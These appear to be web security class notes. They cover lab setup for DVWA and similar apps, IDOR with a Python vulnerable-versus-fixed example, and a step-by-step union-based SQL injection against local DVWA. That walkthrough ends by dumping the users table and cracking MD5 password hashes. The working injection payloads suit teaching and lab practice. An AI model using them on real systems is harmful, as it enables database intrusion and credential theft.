_KabilaN_

Union Based Injection

Feb 8th, 2019
Session 10

Setting up LVS, WAVE and DVWA
For LVS
=======
Step 1 --> Extract the contents of LVS_1 into a folder
Step 2 --> Copy that extracted folder into C:\xampp\htdocs
Step 3 --> Start the XAMPP server --> Apache and MySQL
Step 4 --> In the browser type --> 127.0.0.1/lvs_1
lvs_1 --> Name of the extracted folder



For WAVE
========
Step 1 --> Extract the contents of wave into a folder
Step 2 --> Copy that extracted folder into C:\xampp\htdocs
Step 3 --> Start the XAMPP server --> Apache and MySQL
Step 4 --> In the browser type --> 127.0.0.1/wave1
wave1 --> Name of the extracted folder


For DVWA
========
Step 1 --> Extract the contents of DVWA into a folder
Step 2 --> Copy that extracted folder into C:\xampp\htdocs
Step 3 --> Start the XAMPP server --> Apache and MySQL
Step 4 --> Open DVWA's configuration file, C:\xampp\htdocs\DVWA\config\config.inc.php, and clear the value of the database password setting (db_password). DVWA ships with it set to "p@ssw0rd", but XAMPP's MySQL root account has no password by default, so DVWA cannot connect until the value is emptied.
Step 5 --> In the browser type --> 127.0.0.1/DVWA (on the first visit, click "Create / Reset Database" on the setup page so the dvwa database and its users table get created)
Step 6 --> Log in with the credentials --> admin / password



============x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x==========

METHODS USED IN WEB APPLICATIONS
================================
1. GET - The parameters of the request are sent in the URL query string, so they are visible in the address bar (and also end up in browser history, bookmarks, Referer headers, proxy logs and web server logs). It is an insecure way to send credentials: anyone shoulder surfing can read them straight off the screen. Because GET parameters are trivial to edit in the address bar, they are also the usual starting point for the attacks below (IDOR, SQL injection).
eg: www.aaab.com/haha.php?id=1
www.adsadsa.com/index.php?happyness=null


2. POST - The parameters are sent in the body of the HTTP request instead of in the URL, so they do not appear in the address bar or in server logs. It is the right method for logins and other forms carrying sensitive data, but it is not secrecy: the body still travels in plain text unless the site uses HTTPS, and an intercepting proxy (Burp Suite, for example) can read and modify POST parameters exactly as easily as GET ones. eg. twitter.com/login.php

Demo...

----------------------------------------------------------

INSECURE DIRECT OBJECT REFERENCE
================================
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
Note that in the classic IDOR case the malicious user reaches the resources of another user at the same privilege level (horizontal privilege escalation): the application checks that you are logged in, but never checks that the object you asked for actually belongs to you.

example :

www.hungama.com/user.php?id=1
www.hungama.com/user.php?id=4
www.hungama.com/user.php?id=2
Without proper validation, changing the id jumps you straight into another user's account.

Wave1

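The user.php?id=N pattern above, as an added Python example that is not part of the original notes or of any real site: a handler that looks the id up directly (the IDOR), the same handler with the missing ownership check, and the enumeration loop an attacker runs against each. The USERS records, the Forbidden class standing in for an HTTP 403, and the two handler names are all constructed for this illustration.

```python
# Constructed user records standing in for user.php's backing table
# (sample data for this example, not from hungama.com or any real site).
USERS = {
    1: {"username": "alice", "email": "alice@example.com"},
    2: {"username": "bob", "email": "bob@example.com"},
    4: {"username": "dave", "email": "dave@example.com"},
}


class Forbidden(Exception):
    """Stand-in for an HTTP 403 response."""


def user_page_vulnerable(session_user_id, query: dict) -> dict:
    # user.php?id=N as in the notes: the id from the URL is looked up directly.
    # The only check is that the caller is logged in (session_user_id is set),
    # not that the requested record belongs to them.
    if session_user_id is None:
        raise Forbidden("login required")
    return USERS[int(query["id"])]


def user_page_fixed(session_user_id, query: dict) -> dict:
    # Same endpoint with the ownership check that was missing: a logged-in
    # user may only read their own record. (A role check for admins who are
    # allowed to read everything would sit here as well.)
    if session_user_id is None:
        raise Forbidden("login required")
    requested = int(query["id"])
    if requested != session_user_id:
        raise Forbidden(f"user {session_user_id} may not read record {requested}")
    return USERS[requested]


def enumerate_ids(handler, session_user_id, id_range) -> list:
    # What an attacker logged in as session_user_id does: walk id=1,2,3,...
    # and note every id for which the handler returns a record.
    leaked = []
    for i in id_range:
        try:
            handler(session_user_id, {"id": str(i)})
            leaked.append(i)
        except (Forbidden, KeyError):
            continue  # 403, or no record with that id
    return leaked


if __name__ == "__main__":
    print("vulnerable:", enumerate_ids(user_page_vulnerable, 1, range(1, 6)))  # [1, 2, 4]
    print("fixed:     ", enumerate_ids(user_page_fixed, 1, range(1, 6)))       # [1]
```

The gap between the two lists is exactly the IDOR: with the vulnerable handler, user 1 reads the records of users 2 and 4 without any privilege beyond an ordinary login. Note that the fix compares the requested object against the session, not against anything the client sent; an "owner" field supplied in the request would be just another direct reference to tamper with.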
----------------------------------------------------------

SENSITIVE DATA EXPOSURE
=======================
Many web applications do not properly protect sensitive data such as names, IDs, credit card details, authentication credentials etc. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft or other crimes. Encryption is the other side of this: if the data is not encrypted and sits in plain text, it is far easier for an attacker or any other individual to get hold of it.

Types of Sensitive Data
=======================

1. Personal - Names, addresses, contact numbers etc.
2. Confidential - IDs, passwords (credentials), Aadhaar number.
3. Financial - Bank account numbers, credit cards, debit cards etc.



HOW SENSITIVE DATA CAN BE COMPROMISED
--------=========================--------

1. When data is transmitted in the URL, that is, your credentials are sent as GET parameters:
username=user&password=pass&submit=submit
2. When data is stored in plain text form rather than in hashed (for passwords) or encrypted form.
3. When data is stored in a plain text file (often readable straight from the web root) rather than in the database.

Id  Interest   Gender  Username  Password
-----------------------------------------------
1   Badminton  Female  admin     Pa$$woRd
2   Football   Male    admin2    paSSwOrd

-----------------------------------------------------------------
LVS

SQL Injections
==============
An attacker supplies input that the application concatenates into a SQL query, so the input is interpreted as SQL commands rather than as data, and uses this to read (or modify) the juicy information in the database.
SQLi

UNION BASED SQL INJECTION
=========================
The attacker uses the UNION operator to append the result of a SELECT of his own to the result of the application's original query. Because the merged rows come back in the page's normal output, whatever he selects (table names, column names, password hashes) is displayed where the page would normally show its own data.

DEMO
====
DVWA ---> Security:Low
SQL Injection
Step 1
======
Find a 'GET' parameter.
something=something
php?id=something
php?id=cat
php?id=1
php?id=query

Either you click on some link of the web application/site or enter something in the search box.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1&Submit=Submit#

Step 2
======
Generate a SQL error, to break the query.
1
1'

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1'&Submit=Submit#

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

The page builds its query by pasting the id into a quoted string, so the extra quote leaves an unbalanced quote behind:
SELECT first_name, last_name FROM users WHERE user_id = '1'
SELECT first_name, last_name FROM users WHERE user_id = '1''

An error that echoes the injected quote like this tells us two things: the parameter is injectable, and it sits inside single quotes, so every payload from here on starts with a ' to close that string.
Step 3
======
Count the number of columns the query selects (the result set the page is built from; not the columns of a table or of the whole database).
For counting the number of columns, we use ORDER BY.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 1--+&Submit=Submit#
Shows us data
This query asks the database to sort the result by column number 1

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 2--+&Submit=Submit#
Shows us data
This query asks the database to sort the result by column number 2

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' order by 3--+&Submit=Submit#
Gives us an error
Unknown column '3' in 'order clause'
This query asks the database to sort the result by column number 3
But the query only selects 2 columns, so there is no column number 3 --> it generates an error

order by n--+
n starts from 1 and stops at the first value of n that gives an error; the number of columns is n-1
--+ ---> To comment out the rest of the original query (the closing quote, and anything the application appends after our input)
MySQL only treats -- as a comment when it is followed by whitespace; the + is URL-decoded to a space, which is why --+ is written rather than a bare --. Whatever follows it will not execute at all. We can also use # to comment out the rest of the content, but it must be URL-encoded as %23, since a literal # ends the URL and starts the fragment.

The query selects 2 columns.
Step 4
======
Merge our own rows into the result, using the UNION command. The second SELECT must return exactly as many columns as the original query, so:
union select 1,2,...,n-1--+
n=3 (the first ORDER BY value that errored)
union select 1,2--+


http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,2--+&Submit=Submit#

ID: 1' union select 1,2--
First name: admin
Surname: admin

ID: 1' union select 1,2--
First name: 1
Surname: 2

The second block is the row our UNION added. The page prints our first column where "First name" goes and our second where "Surname" goes, so both positions are reflected in the output and either can be used to carry the data we want to read.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select database(),version()--+&Submit=Submit#

database() --> database name
version() --> Database Version Number
Step 5
======
Query information_schema (jokingly called "the database's mother" in class, because it knows everything about every other database) to get the table names.
information_schema --> the metadata schema --> it contains the names of all the databases, tables and columns present on the server.
information_schema.tables
|-> stores the names of all the tables in every database on the server (its table_schema column says which database each table belongs to).

union select table_name,2 from information_schema.tables--+
or
union select 1,table_name from information_schema.tables--+


We can use either of them because both columns are reflected on the page; otherwise we would put table_name in whichever column is reflected.

http://127.0.0.1/dvwa/DVWA-1.0.8/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables--+&Submit=Submit#

This lists every table on the server, the information_schema and mysql ones included; DVWA's own tables (guestbook and users) are among them. Restricting the query with a WHERE clause that compares table_schema with database() limits the list to the current database.

Step 6
======
Query information_schema again, this time for the column names of the table named users
information_schema
information_schema.columns

union select 1,column_name from information_schema.columns where table_name="users"--+

(The condition matches on table_name alone, so if another database on the server also has a users table its columns will be mixed in; add a condition on table_schema as well to avoid that.)

Step 7
======
Retrieve or dump the data using the above info.
DVWA --> users --> (user_id, first_name, last_name, user, password)

union select 1,group_concat(user_id,0x0a,first_name,0x0a,last_name,0x0a,user,0x0a,password,0x3a) from users--+

group_concat() joins every row of the table into one string, so the whole table comes back in the single column the page reflects, instead of one row per UNION result. 0x0a is a newline between the fields and 0x3a a colon after each row; MySQL accepts these hex literals as strings, which also avoids having to put quotes inside the payload.



The passwords are stored in hashed form (unsalted MD5 in DVWA), so we go online and check whether the hash value is present in a lookup database of precomputed hashes.